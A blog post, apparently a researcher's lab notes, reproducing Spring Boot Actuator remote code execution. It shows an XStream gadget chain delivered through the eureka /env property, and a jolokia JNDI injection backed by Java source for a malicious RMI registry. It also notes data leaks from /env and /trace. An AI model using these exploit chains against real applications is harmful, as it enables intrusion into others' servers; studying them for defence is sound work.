spring actuator 攻击方式分析记录

0x00 复现记录

原文章作者已经给出了漏洞环境:https://github.com/artsploit/actuator-testbed 直接run起来就行,不用管报错信息~

1. 攻击方式一 – 通过eureka组件RCE

Spring actuator 提供了/env接口来查看和改变应用程序的环境变量~因此,找到了eureka.client.serviceUrl.defaultZone属性~ 记录2个要点:

  • 访问/env时,直接复制下面的请求再改细节,浏览器抓包改会有问题~

    POST /env HTTP/1.1
    Host: 127.0.0.1:8090
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    Content-Length: 74
    
    eureka.client.serviceUrl.defaultZone=http://127.0.0.1:8081/java/xstreampoc

XStream的payload(需要更近一步分析):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<linked-hash-set>
<jdk.nashorn.internal.objects.NativeString>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
</is>
</dataSource>
</dataHandler>
</value>
</jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>
  • Xstream的Payload要设置Content-Type头为application/xml(我用nginx配了下)~实际会请求/java/xstreampoc/apps/路由~
  • 使用/env看环境变量有没有改变写入~

2. 攻击方式二 – 通过jolokia组件XXE-RCE

内部是使用SAX解析XML文件的,可以XXE~
这里面涉及到了JNDI注入,Payload是这样的~

1
http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8081!/jndi_poc.xml

jndi_poc.xml内容:

1
2
3
<configuration>
<insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/evilObject" as="appName" />
</configuration>

RMI服务端JNDI的攻击代码(2种方案的限制,请看参考文章):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/**
* 依赖条件:
* - Tomcat8(Spring boot 内嵌), 自带Java EL包~
*/
public static void main(String[] args) throws Exception {
System.out.println("Creating evil RMI registry on port 1097");
Registry registry = LocateRegistry.createRegistry(1097);

//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
//redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
ref.add(new StringRefAddr("forceString", "x=eval"));
//expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','/Applications/Calculator.app/Contents/MacOS/Calculator']).start()\")"));

ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
registry.bind("evilObject", referenceWrapper);
}

JConsole工具,可以看到JMX里面的MBeans,寻找可以利用的地方~实质是通过jolokia组件,控制JMX下的MBean进行利用。请看https://jolokia.org/reference/html/protocol.html

3. 敏感信息泄漏

细心关注/trace,/env等接口可能会发现用户和应用程序的隐私数据~

0x01 RCE攻击原理ToDo

攻击方式一:实质是XStream反序列化的问题~ XStream历史上有许多不依赖第三方包就能进行反序列化攻击的问题,具体分析看看https://github.com/mbechler/marshalsec里面的攻击向量~ 攻击方式二:探讨下,JRMP和JNDI注入攻击在源码层面的原理的根本区别~

0x02 参考链接

https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
https://xz.aliyun.com/t/2233
https://www.veracode.com/blog/research/exploiting-jndi-injections-java

文章作者: angelwhu
文章链接: https://www.angelwhu.com/paper/2019/03/08/spring-agent-attack-mode-analysis-record/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 angelwhu_blog